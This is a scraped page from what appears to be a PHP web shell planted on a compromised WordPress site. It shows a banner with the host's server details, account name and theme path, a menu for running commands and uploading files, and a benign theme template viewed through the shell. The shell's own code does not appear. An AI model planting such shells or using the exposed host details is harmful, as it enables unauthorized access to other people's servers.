hyun.psd; gzuncompress
|
Server IP : 173.236.192.202 / Your IP : 216.73.216.85 Web Server : Apache System : Linux iad1-shared-e1-03 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : andfor18 ( 14551322) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/andfor18/mbssigns.com/wp-content/themes/multinews/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
<?php get_header(); ?>
<div class="main-container clearfix"><!--container-->
<div class="main-left"><!--Main Left-->
<div class="main-content" role="main"><!--Main Content-->
<?php
$display = mom_option('hp-display');
$style = mom_option('hp-blog-style');
$post = mom_option('hp-blog-posts');
$unique_posts = '';
$do_unique_posts = array();
$unique_posts = mom_option('uni_posts');
if($display == 'builder') {
echo apply_filters('the_content', mom_option('home_page_builder'));
} else {
echo do_shortcode('[blog style="'.$style.'" posts_per_page="'.$post.'"]');
}
?>
</div><!--Main Content-->
<?php get_sidebar('left'); ?>
</div><!--Main left-->
<?php get_sidebar(); ?>
</div><!--container-->
</div><!--wrap-->
<?php get_footer(); ?>